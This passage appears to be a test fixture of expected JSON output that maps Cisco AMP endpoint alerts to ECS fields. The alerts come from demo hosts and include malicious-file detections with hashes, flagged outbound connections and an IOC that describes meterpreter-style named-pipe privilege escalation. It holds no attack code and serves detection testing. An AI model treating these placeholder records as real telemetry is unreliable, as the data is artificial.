from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", + "id": "6180341055704007000", + "kind": "alert" + }, + "cisco": { + "amp": { + "detection": "DFC.CustomIPList", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "e1:e5:94:ea:a5:44", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "e1:e5:94:ea:a5:44" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6180341055704006657", + "event_type_id": 1090519084, + "network_info": { + "nfm": { + "direction": "Outgoing connection from" + }, + "parent": { + "disposition": "Clean", + "identity": {} + } + } + } + } + }, + { + "process": { + "name": "iexplore.exe", + "pid": 3136, + "hash": { + "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "sha256": 
"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "md5": "b3581f426dc500a51091cdd5bacf0454" + } + }, + "destination": { + "geo": { + "continent_name": "North America", + "country_name": "United States", + "location": { + "lon": -97.822, + "lat": 37.751 + }, + "country_iso_code": "US" + }, + "as": { + "number": 15169, + "organization": { + "name": "Google LLC" + } + }, + "port": 443, + "ip": "8.8.4.4" + }, + "source": { + "port": 55809, + "ip": "10.10.0.0" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "transport": "TCP", + "direction": "egress" + }, + "@timestamp": "2021-01-15T10:37:43.000Z", + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_Upatre" + ], + "ip": [ + "10.10.0.0", + "8.8.4.4", + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Upatre", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_Upatre" + }, + "event": { + "severity": 3, + "action": "DFC Threat Detected", + "ingested": "2021-09-12T17:31:04.469626640Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat 
Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55809,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", + "id": "6180341055704007000", + "kind": "alert" + }, + "cisco": { + "amp": { + "detection": "DFC.CustomIPList", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "e1:e5:94:ea:a5:44", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "e1:e5:94:ea:a5:44" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6180341055704006661", + "event_type_id": 1090519084, + "network_info": { + "nfm": { + "direction": "Outgoing connection from" + }, + "parent": { + "disposition": "Clean", + "identity": {} + } + } + } + } + }, + { + "process": { + "name": "iexplore.exe", + "pid": 3136, + "hash": { + "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "sha256": 
"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "md5": "b3581f426dc500a51091cdd5bacf0454" + } + }, + "destination": { + "geo": { + "continent_name": "North America", + "country_name": "United States", + "location": { + "lon": -97.822, + "lat": 37.751 + }, + "country_iso_code": "US" + }, + "as": { + "number": 15169, + "organization": { + "name": "Google LLC" + } + }, + "port": 443, + "ip": "8.8.4.4" + }, + "source": { + "port": 55808, + "ip": "10.10.0.0" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "transport": "TCP", + "direction": "egress" + }, + "@timestamp": "2021-01-15T10:37:43.000Z", + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_Upatre" + ], + "ip": [ + "10.10.0.0", + "8.8.4.4", + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Upatre", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_Upatre" + }, + "event": { + "severity": 3, + "action": "DFC Threat Detected", + "ingested": "2021-09-12T17:31:04.469628547Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":931000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat 
Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55808,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", + "id": "6180341055704007000", + "kind": "alert" + }, + "cisco": { + "amp": { + "detection": "DFC.CustomIPList", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "e1:e5:94:ea:a5:44", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "e1:e5:94:ea:a5:44" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6180341055704006660", + "event_type_id": 1090519084, + "network_info": { + "nfm": { + "direction": "Outgoing connection from" + }, + "parent": { + "disposition": "Clean", + "identity": {} + } + } + } + } + }, + { + "process": { + "name": "iexplore.exe", + "pid": 3136, + "hash": { + "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "sha256": 
"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "md5": "b3581f426dc500a51091cdd5bacf0454" + } + }, + "destination": { + "geo": { + "continent_name": "North America", + "country_name": "United States", + "location": { + "lon": -97.822, + "lat": 37.751 + }, + "country_iso_code": "US" + }, + "as": { + "number": 15169, + "organization": { + "name": "Google LLC" + } + }, + "port": 443, + "ip": "8.8.4.4" + }, + "source": { + "port": 55807, + "ip": "10.10.0.0" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "transport": "TCP", + "direction": "egress" + }, + "@timestamp": "2021-01-15T10:37:43.000Z", + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_Upatre" + ], + "ip": [ + "10.10.0.0", + "8.8.4.4", + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Upatre", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_Upatre" + }, + "event": { + "severity": 3, + "action": "DFC Threat Detected", + "ingested": "2021-09-12T17:31:04.469630455Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":900000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat 
Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55807,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", + "id": "6180341055704007000", + "kind": "alert" + }, + "cisco": { + "amp": { + "detection": "DFC.CustomIPList", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "e1:e5:94:ea:a5:44", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "e1:e5:94:ea:a5:44" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6180341055704006659", + "event_type_id": 1090519084, + "network_info": { + "nfm": { + "direction": "Outgoing connection from" + }, + "parent": { + "disposition": "Clean", + "identity": {} + } + } + } + } + }, + { + "process": { + "name": "iexplore.exe", + "pid": 3136, + "hash": { + "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "sha256": 
"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "md5": "b3581f426dc500a51091cdd5bacf0454" + } + }, + "destination": { + "geo": { + "continent_name": "North America", + "country_name": "United States", + "location": { + "lon": -97.822, + "lat": 37.751 + }, + "country_iso_code": "US" + }, + "as": { + "number": 15169, + "organization": { + "name": "Google LLC" + } + }, + "port": 443, + "ip": "8.8.4.4" + }, + "source": { + "port": 55806, + "ip": "10.10.0.0" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "transport": "TCP", + "direction": "egress" + }, + "@timestamp": "2021-01-15T10:37:43.000Z", + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_Upatre" + ], + "ip": [ + "10.10.0.0", + "8.8.4.4", + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Upatre", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_Upatre" + }, + "event": { + "severity": 3, + "action": "DFC Threat Detected", + "ingested": "2021-09-12T17:31:04.469632385Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":869000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat 
Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55806,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", + "id": "6180341055704007000", + "kind": "alert" + }, + "cisco": { + "amp": { + "detection": "DFC.CustomIPList", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "e1:e5:94:ea:a5:44", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "e1:e5:94:ea:a5:44" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6180341055704006658", + "event_type_id": 1090519084, + "network_info": { + "nfm": { + "direction": "Outgoing connection from" + }, + "parent": { + "disposition": "Clean", + "identity": {} + } + } + } + } + }, + { + "process": { + "hash": { + "sha256": "69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9" + } + }, + "@timestamp": 
"2021-01-15T10:32:58.000Z", + "file": { + "name": "cmd.exe", + "path": "/C:/WINDOWS/system32/cmd.exe", + "hash": { + "sha256": "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Command_Line_Arguments_Meterpreter" + ], + "hash": [ + "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Command_Line_Arguments_Meterpreter", + "hostname": "Demo_Command_Line_Arguments_Meterpreter" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:04.469634316Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1476910664322001000,\"timestamp\":1610706778,\"timestamp_nanoseconds\":322000000,\"date\":\"2021-01-15T10:32:58+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706778,\"start_date\":\"2021-01-15T10:32:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Meterpreter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"27:85:29:21:67:49\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. 
Tools such as meterpreter often use this technique to escalate to NT Authority\\\\System.\",\"short_description\":\"W32.PossibleNamedPipeImpersonation.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/WINDOWS/system32/cmd.exe\",\"identity\":{\"sha256\":\"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9\"}}}}}", + "kind": "alert", + "start": "2021-01-15T10:32:58.000Z", + "action": "Cloud IOC", + "id": "1476910664322001000", + "category": [ + "file" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "27:85:29:21:67:49", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Clean", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "27:85:29:21:67:49" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "cloud_ioc": { + "short_description": "W32.PossibleNamedPipeImpersonation.ioc", + "description": "A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System." 
+ }, + "event_type_id": 1107296274 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:27:39.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "\\\\?\\C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "hostname": "Demo_AMP_Threat_Audit", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469636399Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533671385032557000,\"timestamp\":1610706459,\"timestamp_nanoseconds\":25000000,\"date\":\"2021-01-15T10:27:39+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533671385032556606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533671385032557000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533671385032556606", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad" + } + }, + "@timestamp": "2021-01-15T10:24:58.000Z", + "file": { + "hash": { + "sha256": 
"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:04.469638309Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900329000200,\"timestamp\":1610706298,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-15T10:24:58+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706298,\"start_date\":\"2021-01-15T10:24:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}", + "kind": "alert", + "start": "2021-01-15T10:24:58.000Z", + "action": "Multiple Infected 
Files", + "id": "1489955900329000200", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.3372C1EDAB-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 1107296258 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:23:01.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "\\\\?\\C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "hostname": "Demo_AMP_Threat_Audit", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469640203Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533670191031648000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ 
